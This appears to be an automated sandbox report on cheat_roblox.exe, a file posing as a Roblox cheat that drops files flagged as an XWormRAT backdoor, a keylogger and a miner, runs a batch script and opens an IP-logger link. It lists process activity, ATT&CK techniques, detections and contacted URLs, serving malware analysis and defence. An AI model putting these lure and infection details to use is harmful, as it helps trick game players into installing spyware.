            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E3B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6E7E3B190
            Source: C:\Users\user\Desktop\cheat_roblox.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "Jump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeProcess created: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe "C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6Jump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E558E0 cpuid 0_2_00007FF6E7E558E0
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF6E7E3A2CC
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E40754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6E7E40754
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF6E7E251A4 GetVersionExW,0_2_00007FF6E7E251A4
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000000.00000003.1322026963.000001A0A6B7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: cheat_roblox.exe PID: 7640, type: MEMORYSTR
            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED
            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED
            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED

            Remote Access Functionality

            Source: Yara match | File source: 00000000.00000003.1322026963.000001A0A6B7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: cheat_roblox.exe PID: 7640, type: MEMORYSTR
            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED
            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED
            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | 1 Scripting | Valid Accounts | 1 Native API | 1 Scripting | 1 Exploitation for Privilege Escalation | 2 Masquerading | 1 Input Capture | 1 System Time Discovery | Remote Services | 1 Input Capture | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 11 Process Injection | 11 Virtualization/Sandbox Evasion | LSASS Memory | 221 Security Software Discovery | Remote Desktop Protocol | 12 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 1 Registry Run Keys / Startup Folder | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | NTDS | 11 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 21 Software Packing | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | 126 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

            [Behavior Graph: ID 1484385, Sample: cheat_roblox.exe, Startdate: 30/07/2024, Architecture: WINDOWS, Score: 56]

            Source | Detection | Scanner | Label
            cheat_roblox.exe | 59% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
            cheat_roblox.exe | 100% | Joe Sandbox ML |

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Local\Temp\ msedge.exe | 100% | Avira | TR/Spy.Gen
            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | 100% | Avira | TR/Spy.Gen
            C:\Users\user\AppData\Local\Temp\Keyloger.exe | 100% | Avira | TR/Spy.Gen
            C:\Users\user\AppData\Local\Temp\ msedge.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\Keyloger.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\ msedge.exe | 76% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | 76% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
            C:\Users\user\AppData\Local\Temp\Keyloger.exe | 82% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
            C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe | 0% | ReversingLabs |
            No Antivirus matches
            No Antivirus matches

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            counter.yadro.ru | 88.212.202.52 | true | false | | unknown
            a.nel.cloudflare.com | 35.190.80.1 | true | false | | unknown
            edge-term4-ams2.roblox.com | 128.116.21.4 | true | false | | unknown
            2no.co | 172.67.149.76 | true | false | | unknown
            cdn.iplogger.org | 104.21.4.208 | true | false | | unknown
            www.google.com | 142.250.184.228 | true | false | | unknown
            d2v57ias1m20gl.cloudfront.net | 99.86.4.125 | true | false | | unknown
            ecsv2.roblox.com | unknown | unknown | false | | unknown
            26.165.165.52.in-addr.arpa | unknown | unknown | false | | unknown
            client-telemetry.roblox.com | unknown | unknown | false | | unknown
            clientsettingscdn.roblox.com | unknown | unknown | false | | unknown
            198.187.3.20.in-addr.arpa | unknown | unknown | false | | unknown

            Name | Malicious | Antivirus Detection | Reputation
            https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.0641046345653069 | false | Avira URL Cloud: safe | unknown
            https://cdn.iplogger.org/redirect/handshake.png | false | Avira URL Cloud: safe | unknown
            https://2no.co/24RXx6 | false | | unknown
            https://counter.yadro.ru/hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.0641046345653069 | false | Avira URL Cloud: safe | unknown
            https://cdn.iplogger.org/favicon.ico | false | Avira URL Cloud: safe | unknown
            https://a.nel.cloudflare.com/report/v4?s=%2BJTmNHgwHioPN1VPmZTocnt4x9yCwTmjK4IGhHrpCVWNf%2BX0QfcS27EEgMEfDt3n5oBkVrfy2gmymxlRNncb3eE%2BNabns2V2oWdUqt%2B6pchIIk0y0eYxI%2Bvmxvy3PDh%2B%2FlTe | false | Avira URL Cloud: safe | unknown
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://repository.swisssign.com/RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507432352.000000000260D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516389477.00000000025AE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510001432.00000000025AE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508922887.00000000025A0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506685606.000000000260C000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509200841.00000000025AA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508164365.000000000260F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://iplogger.org/privacy/chromecache_71.10.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.roblox.com/RobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510324009.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509773967.0000000002568000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://client-telemetry.roblox.comataRobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510324009.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509773967.0000000002568000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://crl.xrampsecurity.com/XGCA.crlRobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510324009.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509773967.0000000002568000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerLMEMHRobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperwnloadsRobloxPlayerInstaller.exe, 00000004.00000002.1517491839.00000000047FB000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.00000000047BE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.00000000047F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://ecsv2.roblox.com/client/pbeTelemetryV2UrlRobloxTelemetrySendByBatchSizeRobloxTelemetryBatchScheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.roblox.comRobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510324009.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509773967.0000000002568000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://curl.se/docs/http-cookies.htmlcheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.accv.es/legislacion_c.htm0URobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://client-telemetry.roblox.cominatoreyRobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510324009.000000000256B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509773967.0000000002568000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516235530.000000000256B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://cdn.iplogger.org/redirect/logo-dark.pngchromecache_71.10.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://wwww.certigna.fr/autorites/0mRobloxPlayerInstaller.exe, 00000004.00000003.1508083550.00000000047C3000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.00000000047BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://ocsp.accv.es0RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://client-telemetry.roblox.comogsRobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://client-telemetry.roblox.comeRobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://wwww.certigna.fr/autorites/RobloxPlayerInstaller.exe, 00000004.00000003.1509281680.00000000047B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517091060.00000000047B6000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509159312.00000000047AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509602105.00000000047B5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508502616.00000000047A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://curl.se/docs/alt-svc.htmlcheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://cdn.iplogger.org/redirect/brand.pngchromecache_71.10.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://ecsv2.roblox.com/client/pbeesRobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516172847.000000000255F000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509897327.000000000255D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/certcheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmp, cacert.pem.4.dr, RobloxPlayerInstaller.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.quovadisglobal.com/cpsRobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508619596.00000000025FB000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506523382.00000000025E2000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507700641.00000000025FA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516653504.00000000025FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer(RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1510054438.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509329168.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.0000000004827000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517573174.0000000004827000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper.RobloxPlayerInstaller_9F112.log.4.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperadsRobloxPlayerInstaller.exe, 00000004.00000003.1506844085.00000000047F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://crl.securetrust.com/STCA.crlRobloxPlayerInstaller.exe, 00000004.00000002.1516741356.000000000260A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509001220.0000000002606000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508310105.0000000002602000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508695693.0000000002605000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506659428.0000000002623000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506808610.0000000002628000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506475216.00000000025FF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506725819.0000000002625000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516791173.000000000262D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507963440.000000000262D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.accv.es/legislacion_c.htmRobloxPlayerInstaller.exe, 00000004.00000002.1516960770.0000000004790000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://crl.xrampsecurity.com/XGCA.crl0RobloxPlayerInstaller.exe, 00000004.00000003.1345648682.00000000025F1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1381822485.00000000025F0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506523382.00000000025E2000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507700641.00000000025FA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507934077.00000000025FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://clientsettingscdn.roblox.com/v2/client-version/WindowsStudio64RobloxPlayerInstaller.exe, 00000004.00000002.1516990822.000000000479D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508776431.000000000479D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://iplogger.org/rules/chromecache_71.10.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://bit.ly/1eMQ42Ucheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://crl.certigna.fr/certignarootca.crl01RobloxPlayerInstaller.exe, 00000004.00000003.1509281680.00000000047B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517063706.00000000047B3000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509159312.00000000047AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508502616.00000000047A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508083550.00000000047C3000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.00000000047BE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.cert.fnmt.es/dpcs/RobloxPlayerInstaller.exe, 00000004.00000003.1509281680.00000000047B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1517091060.00000000047B6000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509159312.00000000047AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509602105.00000000047B5000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508502616.00000000047A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1508219364.0000000004796000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.winimage.com/zLibDllcheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://s3.amazonaws.com/RobloxPlayerInstaller.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
